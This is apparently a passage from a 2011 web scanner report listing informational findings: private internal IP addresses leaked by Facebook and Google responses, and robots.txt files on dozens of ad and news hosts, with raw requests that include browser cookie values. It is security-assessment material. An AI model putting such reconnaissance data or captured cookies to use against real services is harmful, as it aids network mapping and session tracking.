Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

18.18. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.26.41

Request

GET /plugins/like.php?action=recommend&api_key=130375173667364&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%23%3F%3D%26cb%3Df2705cbcb4%26origin%3Dhttp%253A%252F%252Fau.news.yahoo.com%252Ff315867968%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&font=arial&href=http%3A%2F%2Fau.news.yahoo.com%2Fthewest%2Fa%2F-%2Fwa%2F10210782%2Fwildcats-abandon-bogut-for-nevill%2F&layout=button_count&locale=en_AU&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://au.news.yahoo.com/thewest/a/-/wa/10210782/wildcats-abandon-bogut-for-nevill/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

18.19. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.145.54

Request

GET /plugins/like.php?action=recommend&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2dcfe22b8%26origin%3Dhttp%253A%252F%252Fnews.smh.com.au%252Ff4137d938%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fnews.smh.com.au%2Fbreaking-news-national%2Fwa-labor-launches-another-bushfire-probe-20110907-1jx2h.html&layout=button_count&locale=en_US&node_type=link&sdk=joey&send=false&show_faces=false&width=180 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://news.smh.com.au/breaking-news-national/wa-labor-launches-another-bushfire-probe-20110907-1jx2h.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

18.20. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.64.231.47

Request

GET /plugins/like.php?action=recommend&api_key=113758722003364&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1e4395c78%26origin%3Dhttp%253A%252F%252Fwww.perthnow.com.au%252Ff1e4ddb7cc%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Fwww.perthnow.com.au%2Fbusiness%2Fbusiness-old%2Ffraud-blackmail-in-latest-oswal-claims%2Fstory-e6frg2qu-1226131700884&layout=standard&locale=en_US&node_type=link&sdk=joey&send=true&show_faces=false&width=450 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.perthnow.com.au/business/business-old/fraud-blackmail-in-latest-oswal-claims/story-e6frg2qu-1226131700884
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

18.21. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.64.240.47

Request

GET /plugins/like.php?action=recommend&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3502f5ec8%26origin%3Dhttp%253A%252F%252Fwww.watoday.com.au%252Ff2050513c%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.watoday.com.au%2Fwa-news%2Fthousands-of-wa-households-went-cold-and-hungry-abs-20110906-1jvz4.html&layout=button_count&locale=en_US&node_type=link&sdk=joey&send=false&show_faces=false&width=180 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.watoday.com.au/wa-news/thousands-of-wa-households-went-cold-and-hungry-abs-20110906-1jvz4.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

18.22. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.64.247.48

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df38ea1d448%26origin%3Dhttp%253A%252F%252Fwww.ntnews.com.au%252Ff3e024f7%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Fwww.ntnews.com.au%2Farticle%2F2011%2F09%2F07%2F258681_ntnews.html&layout=standard&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=450 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.ntnews.com.au/article/2011/09/07/258681_ntnews.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

18.23. http://www.facebook.com/plugins/likebox.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/likebox.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.150.43

Request

Response

18.24. http://www.facebook.com/plugins/likebox.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/likebox.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.56.34

Request

Response

18.25. http://www.facebook.com/plugins/likebox.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/likebox.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.168.51

Request

GET /plugins/likebox.php?api_key=135447496484311&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df29d37294%26origin%3Dhttp%253A%252F%252Fwww.perthnow.com.au%252Ff3e1dd5d08%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&header=true&height=290&href=http%3A%2F%2Fwww.perthnow.com.au%2F&id=92409946191&locale=en_US&sdk=joey&show_faces=true&stream=false&width=316 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.perthnow.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

18.26. http://www.facebook.com/plugins/likebox.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/likebox.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.58.30

Request

Response

18.27. http://www.facebook.com/plugins/recommendations.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/recommendations.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.171.59

Request

Response

18.28. http://www.google.com/sdch/StnTz5pY.dct previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/sdch/StnTz5pY.dct

Issue detail

The following RFC 1918 IP address was disclosed in the response:

172.31.196.197

Request

GET /sdch/StnTz5pY.dct HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=SvhSQwwc_f05ytceKz3t_muBbRrFYuwb4q2aMa6_eczHxS7UwVoND78j00dvnenEHEPde95OEOC0FEEsn_DBzr_g2116E6t-KYynBReKkeRqJkxn8r7XlTtVkBWfyFJ5
If-Modified-Since: Tue, 06 Sep 2011 17:24:15 GMT

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Type: application/x-sdch-dictionary
Last-Modified: Wed, 07 Sep 2011 11:53:07 GMT
Date: Wed, 07 Sep 2011 14:13:59 GMT
Expires: Wed, 07 Sep 2011 14:13:59 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 124609

Domain: .google.com
Path: /search

<!doctype html> <head> <title> - Google Search</title> <script>window.google={kEI:" NMWJ_5AK_rfB8gw",kEXPI:"28505,288 30316,31303,31405",kCSI
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: YKq3QHbl0RwJ:www.autotrader.com/+used+cary4a-lQGHU2cJ:www.vehix.com/+used+car &hl=en&ct=clnk&gl=us&source=www.google.com onmousedown="return clk(this.hre
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache:rZQjSq2ux10J:translate.reference.com/+Hzpd6vNFcrsJ:translate.google.com/+ &hl=en&ct=clnk&gl=us&source=www.google.com','','','',' 9&hl=en&ct=clnk&gl=us&source=www.google.com','','',
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: &cd=3 onmousedown="return clk(this.href,'','','',' ')">
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: &hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','',' >
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache:H75rMPosXksJ:www.cars.com/+used+carOJ7l3PBi2ywJ:www.usedcars.com/+used+car1nPyaj3yx18J:www.orbitz.com/App/DisplayCarSearch+ &hl=en&ct=clnk&gl=us&source=ww
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: rnetlion.com/article/Direct-TV-vs-Dish-Network KvzX53GQf98J:www.directv.com/DTVAPP/content/My_Account OHG47yeqhSoJ:www.directv.com/DTVAPP/content/contact_us
...[SNIP]...

19. Robots.txt file previous next
There are 53 instances of this issue:

http://a.analytics.yahoo.com/fpc.pl
http://ad.turn.com/server/pixel.htm
http://ad.yieldmanager.com/imp
http://adfarm.mediaplex.com/ad/js/9608-119290-2042-5
http://adsfac.us/ag.asp
http://api.twitter.com/1/statuses/user_timeline.json
http://au.adserver.yahoo.com/a
http://au.news.yahoo.com/thewest/a/-/wa/10210782/wildcats-abandon-bogut-for-nevill/
http://au.pfinance.yahoo.com/compare/distribution/wan-widget/
http://b.scorecardresearch.com/beacon.js
http://bid.rb.ntc.ace.advertising.com/site=0000799975/size=728090/u=2/bnum=70524729/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=3/f=2/r=1/optn=1/fv=10/aolexp=0/tags=1/rubcpmprice=01F5D655E2FFC4EB/istr=OTYwNDg0Ojc4OjA6MC4wMDA1ODQ2ODowLjAwMDU4NDY4OjAuMDAwNTg0Njg6MC4wMDA1NzMxODoxOjE6MC4wMDA1ODQ2ODowLjk3ODY0ODowLjAwMDUxMjg2NDY6MC4wMDA1ODkyODMzOjEzMTU0MDQwNjE6NTozOjEuMDIxMzUyOjAuMDAwNTEyODY0Ng/srcreq=8/bidtid=AS2463e9943a804387a72e0e9f481b7178/guidm=1007:n4tx19dbice3prpg7887b1ymgzfc6iit/dref=http%253A%252F%252Fwww.perthnow.com.au%252F
http://bs.serving-sys.com/BurstingPipe/ActivityServer.bs
http://cdn.turn.com/server/ddc.htm
http://cdn4.eyewonder.com/cm/js/12963-135748-32613-46
http://cm.au.thewest.overture.com/js_flat_1_0/
http://content.yieldmanager.edgesuite.net/atoms/14/8d/69/e5/148d69e533c1134c3b11f6d485608.swf
http://d3.zedo.com/jsc/d3/ff2.html
http://d7.zedo.com/bar/v16-504/d3/jsc/gl.js
http://data.weatherzone.com.au/json/animator/
http://g-pixel.invitemedia.com/gmatcher
http://g.ca.bid.invitemedia.com/rubicon_imp
http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/130511/0/vj
http://img-cdn.mediaplex.com/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.swf
http://img.mediaplex.com/content/0/12963/135748/CGD_WatchESPN_300x250-2logos_9_6.js
http://l.addthiscdn.com/live/t00/250lo.gif
http://m.xp1.ru4.com/activity
http://map.media6degrees.com/orbserv/hbpix
http://news.smh.com.au/breaking-news-national/wa-labor-launches-another-bushfire-probe-20110907-1jx2h.html
http://pagead2.googlesyndication.com/pagead/imgad
http://pixel.adblade.com/log.php
http://pixel.invitemedia.com/data_sync
http://pixel.quantserve.com/pixel/p-e4m3Yko6bFYVc.gif
http://row.bc.yahoo.com/b
http://s0.2mdn.net/2878385/rsvp_type_300x125.swf
http://s1.2mdn.net/2977403/Yahoo_Homeroom_Texas_300x250.swf
http://static.ak.fbcdn.net/connect/xd_proxy.php
http://sync.mathtag.com/sync/img
http://tags.mathtag.com/view/js/
http://traktr.news.com.au/esi/traktr.js
http://web.adblade.com/imps.php
http://webservice.theweather.com.au/crossdomain.xml
http://www.6pr.com.au/
http://www.7perth.com.au/view/seven-news/
http://www.abc.net.au/perth/news/
http://www.adfusion.com/Adfusion.PartnerSite/categoryhtml.aspx
http://www.bcl.com.au/perth/news.htm
http://www.facebook.com/extern/login_status.php
http://www.google-analytics.com/__utm.gif
http://www.news.com.au/mercury/images/bg-local-guides.gif
http://www.perthnow.com.au/
http://www.smh.com.au/images/promo/St_George_logo60x26.jpg
http://www.themercury.com.au/
http://www.watoday.com.au/

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.

19.1. http://a.analytics.yahoo.com/fpc.pl previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.analytics.yahoo.com
Path:	/fpc.pl

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: a.analytics.yahoo.com

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:16:44 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Cache-control: public, max-age=86400
Last-Modified: Tue, 21 Jun 2011 13:20:59 GMT
Accept-Ranges: bytes
Content-Length: 26
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow: /

19.2. http://ad.turn.com/server/pixel.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.turn.com
Path:	/server/pixel.htm

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad.turn.com

Response

19.3. http://ad.yieldmanager.com/imp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.yieldmanager.com
Path:	/imp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad.yieldmanager.com

Response

HTTP/1.0 200 OK
Date: Wed, 07 Sep 2011 14:14:22 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Wed, 07 Sep 2011 14:14:22 GMT
Pragma: no-cache
Content-Length: 26
Content-Type: text/plain
Age: 0

User-agent: *
Disallow: /

19.4. http://adfarm.mediaplex.com/ad/js/9608-119290-2042-5 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://adfarm.mediaplex.com
Path:	/ad/js/9608-119290-2042-5

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: adfarm.mediaplex.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"26-1158796162000"
Last-Modified: Wed, 20 Sep 2006 23:49:22 GMT
Content-Type: text/plain
Content-Length: 26
Date: Wed, 07 Sep 2011 14:14:35 GMT
Connection: keep-alive

User-agent: *
Disallow: /

19.5. http://adsfac.us/ag.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://adsfac.us
Path:	/ag.asp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: adsfac.us

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Tue, 30 Sep 2008 00:31:21 GMT
Accept-Ranges: bytes
ETag: "e5e89cdc9322c91:0"
Server: Microsoft-IIS/7.0
P3P: CP="NOI DSP COR CUR PSA OUR BUS UNI NAV INT"
Date: Wed, 07 Sep 2011 14:21:04 GMT
Connection: close
Content-Length: 26

User-agent: *
Disallow: /

19.6. http://api.twitter.com/1/statuses/user_timeline.json previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://api.twitter.com
Path:	/1/statuses/user_timeline.json

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: api.twitter.com

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:15:06 GMT
Server: Apache
Vary: Host,Accept-Encoding
Last-Modified: Tue, 06 Sep 2011 18:09:12 GMT
Accept-Ranges: bytes
Content-Length: 26
Cache-Control: max-age=86400
Expires: Thu, 08 Sep 2011 14:15:06 GMT
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /

19.7. http://au.adserver.yahoo.com/a previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://au.adserver.yahoo.com
Path:	/a

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: au.adserver.yahoo.com

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:15:35 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Fri, 03 Mar 2006 21:55:13 GMT
Accept-Ranges: bytes
Content-Length: 41
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=utf-8

# Do not crawl
User-agent: *
Disallow: /

19.8. http://au.news.yahoo.com/thewest/a/-/wa/10210782/wildcats-abandon-bogut-for-nevill/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://au.news.yahoo.com
Path:	/thewest/a/-/wa/10210782/wildcats-abandon-bogut-for-nevill/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: au.news.yahoo.com

Response

19.9. http://au.pfinance.yahoo.com/compare/distribution/wan-widget/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://au.pfinance.yahoo.com
Path:	/compare/distribution/wan-widget/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: au.pfinance.yahoo.com

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:16:57 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Tue, 30 Aug 2011 01:01:10 GMT
Accept-Ranges: bytes
Content-Length: 25
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

19.10. http://b.scorecardresearch.com/beacon.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 06 Jan 2010 17:35:59 GMT
Content-Length: 28
Content-Type: text/plain
Expires: Thu, 08 Sep 2011 14:14:17 GMT
Date: Wed, 07 Sep 2011 14:14:17 GMT
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

User-agent: *
Disallow: /

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bid.rb.ntc.ace.advertising.com
Path:	/site=0000799975/size=728090/u=2/bnum=70524729/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=3/f=2/r=1/optn=1/fv=10/aolexp=0/tags=1/rubcpmprice=01F5D655E2FFC4EB/istr=OTYwNDg0Ojc4OjA6MC4wMDA1ODQ2ODowLjAwMDU4NDY4OjAuMDAwNTg0Njg6MC4wMDA1NzMxODoxOjE6MC4wMDA1ODQ2ODowLjk3ODY0ODowLjAwMDUxMjg2NDY6MC4wMDA1ODkyODMzOjEzMTU0MDQwNjE6NTozOjEuMDIxMzUyOjAuMDAwNTEyODY0Ng/srcreq=8/bidtid=AS2463e9943a804387a72e0e9f481b7178/guidm=1007:n4tx19dbice3prpg7887b1ymgzfc6iit/dref=http%253A%252F%252Fwww.perthnow.com.au%252F

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: bid.rb.ntc.ace.advertising.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 07 Sep 2011 14:14:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Wed, 07 Sep 2011 14:14:31 GMT
Content-Type: text/plain
Content-Length: 26

User-agent: *
Disallow: /

19.12. http://bs.serving-sys.com/BurstingPipe/ActivityServer.bs previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bs.serving-sys.com
Path:	/BurstingPipe/ActivityServer.bs

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: bs.serving-sys.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Mon, 16 Jan 2006 20:19:44 GMT
Accept-Ranges: bytes
ETag: "0b02b30da1ac61:0"
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Wed, 07 Sep 2011 14:14:24 GMT
Connection: close
Content-Length: 28

User-agent: *
Disallow: /

19.13. http://cdn.turn.com/server/ddc.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cdn.turn.com
Path:	/server/ddc.htm

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cdn.turn.com

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Cache-Control: private, no-cache, no-store, must-revalidate
Date: Wed, 07 Sep 2011 14:14:22 GMT
Content-Length: 47
Connection: close

User-agent: *
Disallow: /app
Disallow: /server

19.14. http://cdn4.eyewonder.com/cm/js/12963-135748-32613-46 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cdn4.eyewonder.com
Path:	/cm/js/12963-135748-32613-46

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cdn4.eyewonder.com

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:14:17 GMT
Server: Apache
Last-Modified: Sat, 10 Mar 2007 17:40:16 GMT
ETag: "1384e1-1a-42b5608766000"
Accept-Ranges: bytes
Content-Length: 26
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/plain; charset=ISO-8859-1

User-agent: *
Disallow: /

19.15. http://cm.au.thewest.overture.com/js_flat_1_0/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cm.au.thewest.overture.com
Path:	/js_flat_1_0/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cm.au.thewest.overture.com

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:15:35 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Tue, 03 May 2011 10:14:38 GMT
Accept-Ranges: bytes
Content-Length: 26
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow: /

19.16. http://content.yieldmanager.edgesuite.net/atoms/14/8d/69/e5/148d69e533c1134c3b11f6d485608.swf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://content.yieldmanager.edgesuite.net
Path:	/atoms/14/8d/69/e5/148d69e533c1134c3b11f6d485608.swf

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: content.yieldmanager.edgesuite.net

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "f71d20196d4caf35b6a670db8c70b03d:1132764993"
Last-Modified: Wed, 23 Nov 2005 16:54:34 GMT
Accept-Ranges: bytes
Content-Length: 26
Content-Type: text/plain
Cache-Control: max-age=31536000
Date: Wed, 07 Sep 2011 14:20:05 GMT
Connection: close

User-agent: *
Disallow: /

19.17. http://d3.zedo.com/jsc/d3/ff2.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d3.zedo.com
Path:	/jsc/d3/ff2.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: d3.zedo.com

Response

HTTP/1.0 200 OK
Server: ZEDO 3G
Last-Modified: Mon, 18 May 2009 07:39:20 GMT
ETag: "3a9d10f-4c-46a2ae4677a00"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: text/plain
Date: Wed, 07 Sep 2011 14:14:19 GMT
Content-Length: 76
Connection: close

# Officer Barbrady says "Nothing to see here...."
User-agent: *
Disallow: /

